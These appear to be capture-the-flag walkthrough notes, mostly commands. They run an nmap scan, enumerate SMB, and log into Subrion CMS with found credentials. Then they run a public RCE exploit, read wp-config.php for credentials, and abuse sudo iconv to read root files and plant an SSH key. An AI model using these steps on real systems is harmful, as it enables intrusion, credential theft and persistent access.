nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster didn't find anything and the home page was just the default ubuntu page. Couldn't find anything of interest.
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
smbclient -L //$VICTIM/
smbclient \\\\$VICTIM\\websvr
smb: \> ls
smb: \> prompt
smb: \> mget *
I was able to access the subrion page from panel as mentioned in the message as subrion by itself doesn't work.
Username: admin
Password: Scam2021
Since it's using Subrion CMS v4.2.1 I looked for exploits and found one for a rce
sudo apt-get install python3-bs4
git clone https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE.git
cd CVE-2018-19422-SubrionCMS-RCE/
sudo python3 SubrionRCE.py -u http://$VICTIM/subrion/panel/ -l admin -p Scam2021
cat /var/www/html/wordpress/wp-config.php
The hacker reused the password for both wordpress and ssh.
ssh scamsite@$VICTIM
Password: ImAScammerLOL!123!
LFILE=/root/root.txt
sudo iconv -f 8859_1 -t 8859_1 "$LFILE"
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub
LFILE=/root/.ssh/authorized_keys
echo "$YOURKEY" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"
